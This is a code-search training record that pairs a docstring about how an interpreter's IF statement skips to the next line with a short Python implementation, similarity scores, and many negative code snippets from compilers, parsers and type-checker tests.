[ "0.66444355", "0.66228235", "0.65934485", "0.65253294", "0.63993794", "0.63414425", "0.6330485", "0.63030803", "0.6281445", "0.62749404", "0.6273253", "0.62706274", "0.62627155", "0.62333333", "0.6128069", "0.6122897", "0.60999733", "0.60854125", "0.6048962", "0.6042979", "0.6029864", "0.60283387", "0.6022593", "0.6022314", "0.5999331", "0.59949255", "0.5990542", "0.59866744", "0.59824985", "0.59681135", "0.593726", "0.5907308", "0.5906225", "0.5874376", "0.58686095", "0.586001", "0.5846968", "0.58405715", "0.5834719", "0.580923", "0.58089787", "0.5805307", "0.5801925", "0.5794497", "0.576048", "0.57594", "0.5740647", "0.57194746", "0.57090056", "0.570548", "0.570369", "0.5695329", "0.5693289", "0.56846756", "0.5683871", "0.5680604", "0.56586885", "0.56541145", "0.5641918", "0.56397796", "0.5630665", "0.56106335", "0.5609139", "0.56089914", "0.5605903", "0.5589943", "0.5585157", "0.5577748", "0.55719566", "0.5569546", "0.5566527", "0.55553657", "0.55490685", "0.5527029", "0.5513994", "0.55120236", "0.5506687", "0.55066097", "0.5505701", "0.55043364", "0.55011165", "0.54949814", "0.5492656", "0.54760826", "0.5468116", "0.546093", "0.5447379", "0.5431375", "0.54236037", "0.5423388", "0.54228437", "0.5420452", "0.54185367", "0.5417839", "0.5416571", "0.54142493", "0.5413155", "0.5406514", "0.54057556", "0.5399701", "0.53867984" ]
0.0
-1
An if statement works by skipping to the next line, if the THEN clause is false, otherwise it continues to execute the clauses after the THEN.
def stmt_if(executor, stmt): e = Expression() result = e.eval(stmt._tokens, symbols=executor._symbols) if not result: executor.goto_next_line()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def end_ifeq(self):\n self.indent_left()\n self.write_line(\"endif\")", "def test_28_if(self):\n\t\tinput = \"\"\"procedure main(); var x:integer; begin x:=foo(); end\n\t\tfunction foo():integer; var a:real; begin\n\t\twith a:integer;b:real; do begin if a>0 then return; else return 0; end\n\t\tend\"\"\"\n\t\texpect = \"Type Mismatch In Statement: Return(None)\"\n\t\tself.assertTrue(TestChecker.test(input,expect,428))", "def test_27_if(self):\n\t\tinput = \"\"\"procedure main(); var x:integer; begin x:=foo(); end\n\t\tfunction foo():integer; var a:real; begin\n\t\twith a:integer;b:real; do begin if a>0 then a:=0; else b:=0; end\n\t\tend\"\"\"\n\t\texpect = \"Function foo Not Return\"\n\t\tself.assertTrue(TestChecker.test(input,expect,427))", "def conditional(self) -> global___Statement.Conditional:", "def test_30_if(self):\n\t\tinput = \"\"\"procedure main(); var x:integer; begin x:=foo(); end\n\t\tfunction foo():integer; var a:real; begin\n\t\twith a:integer;b:real; do begin if a>0 then a:=1; else return 0; end\n\t\tend\"\"\"\n\t\texpect = \"Function foo Not Return\"\n\t\tself.assertTrue(TestChecker.test(input,expect,430))", "def test_29_if(self):\n\t\tinput = \"\"\"procedure main(); var x:integer; begin x:=foo(); end\n\t\tfunction foo():integer; var a:real; begin\n\t\twith a:integer;b:real; do begin if a>0 then return 1; else b:=0; end\n\t\tend\"\"\"\n\t\texpect = \"Function foo Not Return\"\n\t\tself.assertTrue(TestChecker.test(input,expect,429))", "def postparsing_precmd(self, statement):\n stop = False\n return stop, statement", "def postparsing_precmd(self, statement):\n stop = False\n return stop, statement", "def _If(self, t):\n self.fill(\"if (\")\n self.dispatch(t.test)\n self.write(\")\")\n self.enter()\n self.dispatch(t.body)\n self.leave()\n # collapse nested ifs into equivalent elifs.\n while (t.orelse and len(t.orelse) == 1 and\n isinstance(t.orelse[0], ast.If)):\n t = t.orelse[0]\n self.fill(\"else if (\")\n self.dispatch(t.test)\n self.write(\")\")\n self.enter()\n self.dispatch(t.body)\n self.leave()\n # final else\n if t.orelse:\n self.fill(\"else\")\n self.enter()\n self.dispatch(t.orelse)\n self.leave()", "def test_31_if(self):\n\t\tinput = \"\"\"procedure main(); var x:integer; begin x:=foo(); end\n\t\tfunction foo():integer; var a:real; begin\n\t\tif a>0 then return 0;\n\t\tend\"\"\"\n\t\texpect = \"Function foo Not Return\"\n\t\tself.assertTrue(TestChecker.test(input,expect,431))", "def compile_if(self):\r\n else_label = \"ELSE_\" + str(self.__if_count)\r\n end_label = \"END_IF_\" + str(self.__if_count)\r\n self.__if_count += 1\r\n self.__advance(n=2)\r\n self.compile_expression()\r\n self.__vmwriter.write_arithmetic(\"not\")\r\n self.__vmwriter.write_if(else_label)\r\n self.__advance(n=2)\r\n self.compile_statements()\r\n self.__vmwriter.write_goto(end_label)\r\n self.__vmwriter.write_label(else_label)\r\n self.__advance()\r\n if self.__tokenizer.keyword() == TYPES_DIC[\"ELSE\"]:\r\n self.__advance(n=2)\r\n self.compile_statements()\r\n self.__advance()\r\n self.__vmwriter.write_label(end_label)", "def test_78_continue(self):\n\t\tinput = \"\"\"procedure main(); var x:integer;\n\t\tbegin while(true)do begin\n\t\twith x:integer; do with x:real; do begin\n\t\t\tif (x>0) then continue;\n\t\t\twith x:integer; do if (x=0) then return;\n\t\tend{with} continue; end{while} continue; end\"\"\"\n\t\texpect = \"Continue Not In Loop\"\n\t\tself.assertTrue(TestChecker.test(input,expect,478))", "def eliminate_ifones(body):\n def isifone(tree):\n if type(tree) is If:\n if type(tree.test) is Num: # TODO: Python 3.8+: ast.Constant, no ast.Num\n if tree.test.n == 1:\n return \"then\"\n elif tree.test.n == 0:\n return \"else\"\n elif type(tree.test) is NameConstant: # TODO: Python 3.8+: ast.Constant, no ast.NameConstant\n if tree.test.value is True:\n return \"then\"\n elif tree.test.value in (False, None):\n return \"else\"\n return False\n\n def optimize(tree): # stmt -> list of stmts\n t = isifone(tree)\n if t:\n branch = tree.body if t == \"then\" else tree.orelse\n return branch\n return [tree]\n\n return transform_statements(optimize, body)", "def visit_if(self: Parser, node: doc.If) -> None:\n with self.var_table.with_frame():\n with T.If(self.eval_expr(node.test)):\n with T.Then():\n with self.var_table.with_frame():\n self.visit_body(node.body)\n if node.orelse:\n with T.Else():\n with self.var_table.with_frame():\n self.visit_body(node.orelse)", "def test_77_continue(self):\n\t\tinput = \"\"\"procedure main(); var x:integer;\n\t\tbegin while(true)do begin\n\t\twith x:integer; do with x:real; do begin\n\t\t\tif (x>0) then continue;\n\t\t\twith x:integer; do if (x=0) then continue; else return;\n\t\tend{with} end{while} foo(); end\"\"\"\n\t\texpect = \"Undeclared Procedure: foo\"\n\t\tself.assertTrue(TestChecker.test(input,expect,477))", "def test_if_elseif_and_statement():\n r = convert_code(\n \"{if foo}\\nbar\\n{elseif awesome.sauce[1] and blue and 'hello'}\\nfoo{/if}\")\n assert r == \"{% if foo %}\\nbar\\n{% elseif awesome.sauce[1] and blue and 'hello' %}\\nfoo{% endif %}\"", "def dummy_elif(dummy_code_block):\n return make_dummy_elif()", "def test_76_continue(self):\n\t\tinput = \"\"\"procedure main(); var x:integer;\n\t\tbegin while(true)do begin\n\t\twith x:integer; do with x:real; do begin\n\t\t\tif (x>0) then continue;\n\t\t\twith x:integer; do continue;\n\t\tend{with} end{with} foo(); end\"\"\"\n\t\texpect = \"Undeclared Procedure: foo\"\n\t\tself.assertTrue(TestChecker.test(input,expect,476))", "def get_if_condition(self, file, i):\n\n # Check if 'if function' is to run main function of program\n if re.match(\"if __name__ == [\\\"']__main__[\\\"']:\", file[i]) and \\\n re.match(r\"\\s*main\\(\\)\", file[i + 1]):\n\n # If yes, return None\n return \"omit\", 2, \n\n # Run super definition\n line = super().get_if_condition(file, i)\n\n # Strip ending colon\n line = line.split(\":\", 1)\n line, multi_statement = line[0], line[1]\n\n # Set if keyword for back translation\n ln_split = line.split(\" \")\n if ln_split[0] not in [\"elif\", \"else\"]:\n if_kw = \"if\"\n else:\n if_kw, line = ln_split[0], \" \".join(ln_split[1:]).strip()\n\n # Replace 'elif' with standard\n if if_kw == \"elif\":\n if_kw = \"else if\"\n\n # Replace logical operators\n line = self.replace_logical_ops(line, direction=\"to\")\n\n # Create start and end for while call\n start = []\n end = []\n\n # Check if multiple statements are declared in one line\n if multi_statement.strip():\n start += multi_statement.split(\";\")\n\n # Return if condition\n return line, if_kw, start, end", "def test_if_elseif_paren_statement():\n r = convert_code(\n \"{if foo}\\nbar\\n{elseif (foo and bar) or foo and (bar or (foo and bar))}\\nfoo{/if}\")\n assert r == \"{% if foo %}\\nbar\\n{% elseif (foo and bar) or foo and (bar or (foo and bar)) %}\\nfoo{% endif %}\"", "def compile_if(self):\r\n lab1 = self.class_name + \".L\" + str(self.label_index)\r\n self.label_index += 1\r\n lab2 = self.class_name + \".L\" + str(self.label_index)\r\n self.label_index += 1\r\n self.tokenizer.advance() # ignore 'if' keyword\r\n self.tokenizer.advance() # ignore '(' symbol\r\n self.compile_expression()\r\n self.code_writer.write_arithmetic(\"not\")\r\n self.tokenizer.advance() # ignore ')' symbol\r\n self.tokenizer.advance() # ignore '{'\r\n self.code_writer.write_if(lab1)\r\n self.compile_statements()\r\n self.code_writer.write_goto(lab2)\r\n self.tokenizer.advance() # ignore '}' symbol\r\n self.code_writer.write_label(lab1)\r\n if (self.tokenizer.token_type() == JackTokenizer.KEYWORD_T and\r\n self.tokenizer.key_word() == \"else\"):\r\n self.tokenizer.advance()\r\n self.tokenizer.advance() # ignore '{' symbol\r\n self.compile_statements()\r\n self.tokenizer.advance() # ignore '}' symbol\r\n self.code_writer.write_label(lab2)", "def compile_else(self):\n\n\t\txml = self.tokenizer.keyword() + self.tokenizer.symbol() + '<statements>\\n'\n\t\tself.outfile.write(xml)\n\n\t\twhile self.tokenizer.get_token() != '}':\n\t\t\tself.compile_statements()\n\n\t\txml = '</statements>\\n' + self.tokenizer.symbol()\n\t\tself.outfile.write(xml)", "def with_if_statement():\n if c():\n return t()\n else:\n return f()", "def parseIfStatement( ): # parse rountine for the if and uses the if class to print out the appropriate string\n\n\ttok = tokens.peek( )\n\tif debug: print( \"ifStatement: \", tok )\n\tstart = match( \"if\" )\n\texpr = expression( )\n\tblk = parseBlock( )\n\telseblk = None\n\ttok = tokens.peek( )\n\tif tok == \"else\":\n\t\tmatch( \"else\" )\n\t\telseblk = parseBlock( )\n\treturn ifStatement(expr, blk, elseblk)", "def test_if_elseif_else_statement():\n r = convert_code(\n \"{if foo}\\nbar\\n{elseif blue}\\nfoo\\n{else}bar{/if}\")\n assert r == \"{% if foo %}\\nbar\\n{% elseif blue %}\\nfoo\\n{% else %}bar{% endif %}\"", "def link_if_stmt(self, stmt):\n self.link_expr(stmt.cond)\n self.link_stmt(stmt.true_body)\n if stmt.false_body is not None:\n self.link_stmt(stmt.false_body)", "def _IfExp(self, t):\n self.dispatch(t.test)\n self.write(\" ? \")\n self.dispatch(t.body)\n self.write(\" : \")\n self.dispatch(t.orelse)", "def test_if_statement_multiple():\n r = convert_code(\n \"{if !foo or foo.bar or foo|bar:foo['hello']}\\nfoo\\n{/if}\")\n assert r == \"{% if not foo or foo.bar or foo|bar(foo['hello']) %}\\nfoo\\n{% endif %}\"", "def _check_semicolon_else_skip(self, symbol):\n if symbol.type == self.scanner.SEMICOLON:\n pass\n else:\n self._display_syntax_error(\"semicolon\")\n # Skip to semicolon at end of line\n self._semicolon_skipper()", "def start_ifeq(self, left, right):\n self.write_line(\"ifeq (\" + left + \",\" + right + \")\")\n self.indent_right()", "def test_if_elseif_statement():\n r = convert_code(\n \"{if foo}\\nbar\\n{elseif blue}\\nfoo{/if}\")\n assert r == \"{% if foo %}\\nbar\\n{% elseif blue %}\\nfoo{% endif %}\"", "def test_32_if(self):\n\t\tinput = \"\"\"function foo():integer; var a:real; begin\n\t\twith a:integer;b:real; do begin if a=0 then return 1; else return a; end\n\t\tend\n\t\tprocedure main(); var x:integer; begin x:=foo(); foo(); end\"\"\"\n\t\texpect = \"Undeclared Procedure: foo\"\n\t\tself.assertTrue(TestChecker.test(input,expect,432))", "def multi_statement() -> None:\n pass; print(\"hello\")", "def _check_multiline_conditions(self, node: ast.If) -> None:\n start_lineno = getattr(node, 'lineno', None)\n for sub_nodes in ast.walk(node.test):\n sub_lineno = getattr(sub_nodes, 'lineno', None)\n if sub_lineno is not None and sub_lineno > start_lineno:\n self.add_violation(MultilineConditionsViolation(node))\n break", "def _process_if(self, node):\n creg = node.children[0].name\n cval = node.children[1].value\n self.backend.set_condition(creg, cval)\n self._process_node(node.children[2])\n self.backend.drop_condition()", "def elifs_to_if_then_else(stm):\n if stm.elifs:\n # replace elifs with nested if statements\n ifFalse = HdlStmBlock()\n topIf = HdlStmIf(stm.cond, stm.if_true, ifFalse)\n\n for c, stms in stm.elifs:\n _ifFalse = HdlStmBlock()\n\n lastIf = HdlStmIf(c, stms, _ifFalse)\n\n ifFalse.append(lastIf)\n ifFalse = _ifFalse\n\n if stm.if_false is None:\n lastIf.if_false = HdlStmBlock()\n else:\n lastIf.if_false = stm.if_false\n\n return topIf\n return stm", "def cond2if(cond_exp):\n def expand_clauses(list_of_clauses): \n if isNull(list_of_clauses):\n return FALSE # 4-15\n first = first_clause(list_of_clauses)\n rest = rest_clauses(list_of_clauses)\n if isElseClause(first):\n if isNull(rest):\n return seq2exp(cond_actions(first)) \n else:\n raise ValueError(\"ELSE clause is not last -- cond2if\")\n else:\n return make_if(\n cond_predicate(first),\n seq2exp(cond_actions(first)), # make a single \"'begin\" expression\n expand_clauses(rest))\n return expand_clauses(cond_clauses(cond_exp)) # 4-15 changed exp to cond_exp", "def should_execute(self, context: dict) -> bool:\n\n print(f'Checking snippet: {self.name}')\n\n if 'when' not in self.metadata:\n # always execute when no when conditional is present\n print(f'No conditional present, proceeding with skillet: {self.name}')\n return True\n\n when = self.metadata['when']\n when_str = '{{%- if {0} -%}} True {{%- else -%}} False {{%- endif -%}}'.format(when)\n when_template = self._env.from_string(when_str)\n results = when_template.render(context)\n print(f' Conditional Evaluation results: {results} ')\n if str(results).strip() == 'True':\n return True\n else:\n return False", "def __EvaluateIf(self, countIf, line):\n countIf = countIf - 1\n i = self.__ifs[countIf]\n i.SetLinePointer(self.__linePointer)\n #s = self.ScanIfCond(self.__oc.GermanUmlautReplace(line))\n s = self.ScanIfCond(line)\n if s:\n i.Set(s[0])\n try:\n i.Eval()\n line = ''\n except:\n raise Core.Error.IfHasNoEndif(0, 'IF-EXPRESSION %i HAS HAD AN ERROR:' \\\n ' EITHER NO CORRESPONDING (endif) OR SYNTAX ERROR'\n % countIf)\n l1, l2 = i.GetNextLine(), line\n return l1, l2", "def visit_if(self, node):\n branches = 1\n # don't double count If nodes coming from some 'elif'\n if node.orelse and len(node.orelse) > 1:\n branches += 1\n self.inc_branch(branches)\n self.stmts += branches", "def special_if(self, form):\n testforms = [form[1:]]\n elseform = None\n\n startIndex = None\n\n parent = form.up()\n\n for i in range(len(parent)):\n x = parent[i]\n if x is form:\n startIndex = i\n\n if startIndex is None:\n raise RuntimeError(\"Bad\")\n\n # find following forms that begin with `elif' and `else'. We\n # break on anything else. Accumulate number of forms to delete.\n index = startIndex + 1\n\n while index < len(parent):\n f = parent[index]\n if isinstance(f, Form) and len(f) and isinstance(f[0], Identifier):\n if f[0].name == 'elif':\n testforms.append(f[1:])\n f.insert(0, Ignore)\n elif f[0].name == 'else':\n elseform = f[1:]\n f.insert(0, Ignore)\n # there should be nothing after else\n break \n else:\n # Anything other than elif or else, break\n break \n else:\n # it doesn't look anything at all like an else or an elif form\n break \n index += 1\n\n tests = [(self.reallyCompile(t[0]), self.compileSuite(t[1:])) for t in testforms]\n else_ = elseform and self.compileSuite(elseform)\n\n r = ast.If(tests, else_)\n return r", "def _apply_if_statement(statement: ast.If) -> None:\n for child in ast.iter_child_nodes(statement):\n if isinstance(child, ast.If):\n if child in statement.orelse:\n setattr(statement, 'wps_if_chained', True) # noqa: B010\n setattr(child, 'wps_if_chain', statement) # noqa: B010", "def stop_when_true(test_expr, result_expr, seq):\n result = None\n for e in seq:\n if test_expr(e):\n result = result_expr(e)\n break\n return result", "def cond(\n scheduler: Scheduler,\n parent_job: Job,\n sexpr: SchedulerExpression,\n cond_expr: Any,\n then_expr: Any,\n *rest: Any,\n) -> Promise:\n exprs = (cond_expr, then_expr) + rest\n\n def then(args):\n i, cond_value = args\n\n if cond_value:\n # Return 'then' clause.\n return scheduler.evaluate(exprs[i + 1], parent_job=parent_job)\n\n elif len(exprs) - i == 3:\n # No more expresses, so return 'otherwise' clause.\n return scheduler.evaluate(exprs[i + 2], parent_job=parent_job)\n\n else:\n # Recurse to next conditional clause.\n return scheduler.evaluate((i + 2, exprs[i + 2]), parent_job=parent_job).then(then)\n\n # Evaluate conditional clause.\n return scheduler.evaluate((0, cond_expr), parent_job=parent_job).then(then)", "def item5():\n for i in range(3):\n print('Loop %d' % i)\n else:\n print('Else block!')\n\n for i in range(3):\n print('Loop2 %d' % i)\n if i == 1:\n break\n else:\n print('Else2 block!')\n\n for x in []:\n print('Never runs')\n else:\n print('Else3 block!')\n\n while False:\n print('Never runs')\n else:\n print('Else4 block!')", "def compile_if(self) -> None:\n self._consume('if')\n self._consume('(')\n self.compile_expression()\n self._consume(')')\n\n end_lbl = f'IF_END_{self._if_count}'\n false_lbl = f'IF_FALSE_{self._if_count}'\n self._if_count += 1\n\n self._consume('{')\n self.writer.write_if(false_lbl)\n\n self.compile_statements()\n self.writer.write_goto(end_lbl)\n self.writer.write_label(false_lbl)\n\n self._consume('}')\n\n if self._get_current_token() == 'else':\n self._consume('else')\n self._consume('{')\n self.compile_statements()\n self._consume('}')\n\n self.writer.write_label(end_lbl)", "def Require(condition):\n if not condition:\n Revert()\n return True", "def irgen_continue(stmt, builder, table):\n tmp = builder.unreachable() \n if stmt.label:\n table.conts[tmp] = (builder.block, table[stmt.label])\n else:\n table.conts[tmp] = (builder.block, None)", "def test_if_paren_statement():\n r = convert_code(\n \"{if (foo and bar) or foo and (bar or (foo and bar))}\\nbar\\n{else}\\nfoo{/if}\")\n assert r == \"{% if (foo and bar) or foo and (bar or (foo and bar)) %}\\nbar\\n{% else %}\\nfoo{% endif %}\"", "def _ifelse(self):\n debug.show(\"ifelse:Stack = \" + str(self.opStack))\n if self.opStack.size() >= 3:\n falseCode = check.isCode(self.opStack.pop()) # Make sure it is code (a list)\n trueCode = check.isCode(self.opStack.pop()) # Make sure it is code (a list)\n if check.isBool(self.opStack.pop()):\n debug.show(\"ifelse:True\")\n self.evaluate(trueCode)\n else:\n debug.show(\"ifelse:False\")\n self.evaluate(falseCode)\n else:\n debug.err(\"not enough items on the stack\")\n return None", "def test_73_break(self):\n\t\tinput = \"\"\"procedure main(); var x:integer;\n\t\tbegin while(true)do begin\n\t\twith x:integer; do with x:real; do begin\n\t\t\tif (x>0) then break;\n\t\t\twith x:integer; do if (x=0) then break; else return;\n\t\tend{with} end{while} foo(); end\"\"\"\n\t\texpect = \"Undeclared Procedure: foo\"\n\t\tself.assertTrue(TestChecker.test(input,expect,473))", "def check_continue(config: SimpleNamespace, prev: str=None, next: str=None) -> None:\n if config.general.debug_mode:\n if prev and next:\n print(f'\\n{prev.upper()} phase completed. Next up: {next.upper()} phase.')\n x = input('\\nDo you want to continue y/n? ')\n if x not in ['yes', 'y', '']:\n print()\n sys.exit(0)", "def perform(self):\n if self.format_and_eval_string(self.condition):\n raise ContinueException()", "def parse_if_cmd(self, line):\n line = re.sub(\"^if *\", \"\", line)\n\n # remove the brackets\n statement, _ = gen_parse.get_str_between_delims(line, \"(\", \")\")\n\n # Check all variables have been declared\n any_vars = [i for i in re.findall(IN_STR_VAR_REGEX, statement)]\n # Get the variables declared\n _vars = []\n for var in any_vars:\n _Var = getattr(self, var.strip('$'))\n if type(_Var) == inp_types.Variable: _vars.append(_Var.data)\n else: _vars.append(_Var)\n\n for var_name, var_val in zip(any_vars, _vars):\n statement = statement.replace(var_name, str(var_val))\n\n # Evaluate the if statement\n try:\n var_container = {}\n exec(f\"val = {statement}\", var_container)\n val = var_container['val']\n except Exception as e:\n self.print_error(\"Couldn't parse the if statement\\n\\nError:\"\n + str(e))\n\n end_line = self.get_end_brace()\n\n self.line_num += 1\n if val is False:\n self.line_num = end_line", "def check_if_statement(self, line):\n line = re.sub(\"^if *\", \"\", line)\n if '(' not in line or ')' not in line:\n self.print_error(\"Syntax error: If statements take the syntax if (condition) { ... }\",\n errorFunc=SyntaxError)\n\n\n # remove the brackets\n statement, _ = gen_parse.get_str_between_delims(line, \"(\", \")\")\n\n\n # Check all variables have been declared\n any_vars = [i.strip('$') for i in re.findall(VAR_REGEX, statement)]\n for var_name in any_vars:\n if var_name not in self.variables:\n self.print_error(f\"Unknown variable: {var_name}\")", "def _analyse_stmt_Continue(\n self, statement: ast.Continue, *, next: CFNode\n ) -> CFNode:\n return self._ast_node(statement, next=self._context[_CONTINUE])", "def verify_skip(self, d_stmt, table): \n pass", "def IfStatement(self):\n self.currtok = next(self.tg)\n if self.currtok[1].name == \"LPAREN\":\n self.currtok = next(self.tg)\n express = self.Expression()\n if self.currtok[1].name == \"RPAREN\":\n self.currtok = next(self.tg)\n state = self.Statement()\n if self.currtok[1].name == \"else\":\n self.currtok = next(self.tg)\n state2 = self.Statement()\n return ifelseStmt(express, state, state2)\n else:\n return ifStmt(express, state)\n raise SLUCSyntaxError(\"ERROR: Missing right paren on line {0}\".format(str(self.currtok[2] - 1)))\n raise SLUCSyntaxError(\"ERROR: Missing left paren on line {0}\".format(str(self.currtok[2] - 1)))", "def statement( ): # parse rountin for statement that makes sure the token is one of the following, eventually there will be an error caught\n\n\ttok = tokens.peek( )\n\tif debug: print( \"statement: \", tok )\n\tif tok == \"if\":\n\t\tstat = parseIfStatement( )\n\t\treturn stat\n\telif tok == \"while\":\n\t\tstat = parseWhileStatement( )\n\t\treturn stat\n\telse: \n\t\tstat = parseAssign( )\n\t\treturn stat", "def statements(self):\n\n while self.token.value not in ('EOF', 'else', 'end'):\n\n with self.resync('\\n', consume=True):\n self.statement()\n\n if not self.match(Tokens.SYMBOL, \";\"):\n self.error(\"expected ';' after statement \", token=self.prev_token, after_token=True)\n\n # consume the 'end' token if there is one\n self.match(Tokens.KEYWORD, 'end')", "def test_if_else_statement():\n r = convert_code(\"{if foo}\\nbar\\n{else}\\nfoo{/if}\")\n assert r == \"{% if foo %}\\nbar\\n{% else %}\\nfoo{% endif %}\"", "def switch(cond, ift, iff):", "def test_34_break(self):\n\t\tinput = \"\"\"function foo():integer; var a:real; begin\n\t\twhile a > 0 do\n\t\twith a:integer;b:boolean; do begin b:=true; break; end\n\t\treturn 1;\n\t\tend\n\t\tprocedure main(); var x:integer; begin x:=foo(); foo(); end\"\"\"\n\t\texpect = \"Undeclared Procedure: foo\"\n\t\tself.assertTrue(TestChecker.test(input,expect,434))", "def ifelse(test, if_true, if_false):\n if test:\n return if_true\n else:\n return if_false", "def _if(self):\n debug.show(\"if:Stack = \" + str(self.opStack))\n if self.opStack.size() >= 2:\n ifcode = isCode(self.opStack.pop()) # Make sure it is code (a list)\n if check.isBool(self.opStack.pop()):\n debug.show(\"if:True\")\n evaluate(ifcode)\n else:\n debug.err(\"not enough items on the stack\")\n debug.show(\"if:False\")\n return None", "def close_conditional_guard(close_conditional):\n for _ in range(close_conditional):\n print(\"#endif\")", "def visitIfElse(self, ctx):\n # type: (RelayParser.IfElseContext) -> expr.If\n cond = self.visit(ctx.expr())\n\n self.enter_var_scope()\n true_branch = self.visit(ctx.body(0))\n self.exit_var_scope()\n\n self.enter_var_scope()\n false_branch = self.visit(ctx.body(1))\n self.exit_var_scope()\n\n return expr.If(cond, true_branch, false_branch)", "def if_function(condition, true_result, false_result):\n if condition:\n return true_result\n else:\n return false_result", "def if_function(condition, true_result, false_result):\n if condition:\n return true_result\n else:\n return false_result", "def if_function(condition, true_result, false_result):\n if condition:\n return true_result\n else:\n return false_result", "def if_function(condition, true_result, false_result):\n if condition:\n return true_result\n else:\n return false_result", "def visit_IfNode(self, node: IfNode, symbol_table: SymbolTable) -> Union[List, ReturnNode]:\n for case in node.cases:\n condition = case[0]\n passed_cases = []\n for idx, cond in enumerate(condition):\n result = self.visit(cond, symbol_table)\n passed_cases.append(result)\n expr = case[-1]\n if False in [num.value == 1 for num in passed_cases]:\n pass\n else:\n block_results = []\n for line in [elem for elem in expr if elem is not None]:\n if isinstance(line, ReturnNode):\n return line\n res = self.visit(line, symbol_table)\n block_results.append(res)\n return block_results\n\n if node.else_case:\n expr = node.else_case\n\n block_results = []\n for line in [elem for elem in expr if elem is not None]:\n if isinstance(line, ReturnNode):\n return line\n res = self.visit(line, symbol_table)\n block_results.append(res)\n\n return block_results", "def _While(self, t):\n self.fill(\"while (\")\n self.dispatch(t.test)\n self.write(\")\")\n self.enter()\n self.dispatch(t.body)\n self.leave()\n if t.orelse:\n self.RaiseError(t, \"While else not supported\")", "def whilestmt(self, w):\n invs = self.assemble_invariants(w)\n b_mid = self.flatten([Tree('assume', [w[0]]), w[-1], Tree('assert', invs), Tree('assume', [Tree('const_false', [])])])\n b = self.flatten([Tree('assert', invs),\n self.assemble_havoc(w),\n Tree('assume', invs),\n Tree('wpor', [Tree('block', b_mid), Tree('assume', self._not(w[0]))])])\n return b", "def while_(self):\n if self.line.startswith('wh'):\n if self.line.endswith('while') is False:\n return True", "def _analyse_stmt_If(self, statement: ast.If, *, next: CFNode) -> CFNode:\n # Analyse both branches unconditionally: even if they're not reachable,\n # they still need to exist in the graph produced.\n if_branch = self._analyse_statements(statement.body, next=next)\n else_branch = self._analyse_statements(statement.orelse, next=next)\n\n # Analyse the condition, if a constant.\n branches: Dict[str, CFNode] = {}\n test_is_constant, test_value = self._expression_as_constant(statement.test)\n if test_is_constant:\n if test_value:\n branches.update(enter=if_branch)\n else:\n branches.update(else_=else_branch)\n else:\n branches.update(enter=if_branch, else_=else_branch, error=self._raise)\n\n return self._ast_node(statement, **branches)", "def executeIf(tree,file):\n if(evalBoolean(tree.children[0])):\n explore(tree.children[1],file)", "def test_74_break(self):\n\t\tinput = \"\"\"procedure main(); var x:integer;\n\t\tbegin while(true)do begin\n\t\twith x:integer; do with x:real; do begin\n\t\t\tif (x>0) then break;\n\t\t\twith x:integer; do if (x=0) then return;\n\t\tend{with} break; end{while} break; end\"\"\"\n\t\texpect = \"Break Not In Loop\"\n\t\tself.assertTrue(TestChecker.test(input,expect,474))", "def condition_forward_checking(csp, var) :\n return False", "def condition_forward_checking(csp, var) :\n return False", "def newif(line):\n if not line.startswith(\"\\\\newif\"):\n return False\n pieces = line.split(\"\\\\\")\n if len(pieces) != 4 or pieces[0] != \"\" or pieces[1] != \"newif\":\n print(\"%Wrong number of pieces: \"+line)\n return False\n if not pieces[2].startswith(\"if\"):\n print(\"%Missing if: \"+line)\n return False\n name = pieces[2][2:]\n if not pieces[3].startswith(name):\n print(\"%Name missing: \"+line)\n return False\n value = pieces[3][len(name):]\n if not value in truth:\n print(\"Misunderstood truth value: \"+line)\n return False\n conditionals[\"\\\\if\"+name] = truth[value]\n return True", "def test_03_pass(self):\n if x==1:\n pass", "def test_condition_split(self):\n self.write_contents(\n 'external/wpt/fail.html.ini', \"\"\"\\\n [fail.html]\n expected:\n if product == \"content_shell\": FAIL\n \"\"\")\n self.update(\n {\n 'run_info': {\n 'product': 'content_shell',\n 'os': 'mac',\n 'port': 'mac12',\n },\n 'results': [{\n 'test': '/fail.html',\n 'status': 'TIMEOUT',\n 'expected': 'FAIL',\n }],\n }, {\n 'run_info': {\n 'product': 'content_shell',\n 'os': 'win',\n 'port': 'win11',\n },\n 'results': [{\n 'test': '/fail.html',\n 'status': 'FAIL',\n 'expected': 'FAIL',\n }],\n }, {\n 'run_info': {\n 'product': 'chrome',\n 'os': 'linux',\n 'port': 'trusty',\n },\n 'results': [{\n 'test': '/fail.html',\n 'status': 'PASS',\n 'expected': 'PASS',\n }],\n },\n overwrite_conditions='yes')\n path = self.finder.path_from_web_tests('external', 'wpt',\n 'fail.html.ini')\n lines = self.tool.filesystem.read_text_file(path).splitlines()\n expected = textwrap.dedent(\"\"\"\\\n [fail.html]\n expected:\n if (product == \"content_shell\") and (os == \"win\"): FAIL\n if (product == \"content_shell\") and (os == \"mac\"): TIMEOUT\n \"\"\")\n # TODO(crbug.com/1299650): The branch order appears unstable, which we\n # should fix upstream to avoid create spurious diffs.\n self.assertEqual(sorted(lines, reverse=True), expected.splitlines())", "def Continue():\n # adjust this to take as many steps as you need\n return warp.top.it <= 500", "def stopIf(self, expr, message):\r\n if expr: self.stop(message)", "def OnInternalStatement(\r\n result: \"Statement.StatementParseResultItem\",\r\n iter_before: NormalizedIterator,\r\n iter_after: NormalizedIterator,\r\n ) -> bool: # True to continue, False to terminate\r\n raise Exception(\"Abstract method\") # pragma: no cover\r", "def makeMove(self, movable_statement):\n ### Student code goes here\n # ToGO:\n # if not(self.isMovableLegal(movable_statement)):\n # pass\n currDisk = movable_statement.terms[0]\n prevPeg = movable_statement.terms[1]\n newPeg = movable_statement.terms[2]\n\n # On next peg\n newOnStatement = Statement()\n newOnStatement.predicate = 'on'\n newOnStatement.terms = [currDisk, newPeg]\n newOnFact = Fact(newOnStatement)\n self.kb.kb_assert(newOnFact) #1\n\n #Not on previous peg\n removeOnStatement = Statement()\n removeOnStatement.predicate = 'on'\n removeOnStatement.terms = [currDisk, prevPeg]\n removeOnFact = Fact(removeOnStatement)\n self.kb.kb_retract(removeOnFact) #2\n\n\n #If Prev Empty Logic\n ONStatement = Statement()\n ONTerm1 = Term('?x')\n ONTerm2 = Term(prevPeg)\n ONStatement.terms = (ONTerm1, ONTerm2)\n ONStatement.predicate = 'on'\n ONFact = Fact(ONStatement)\n if not(self.kb.kb_ask(ONFact)):\n prevEmptyStatement = Statement()\n prevEmptyStatement.terms = [prevPeg]\n prevEmptyStatement.predicate = 'empty'\n prevEmptyFact = Fact(prevEmptyStatement)\n 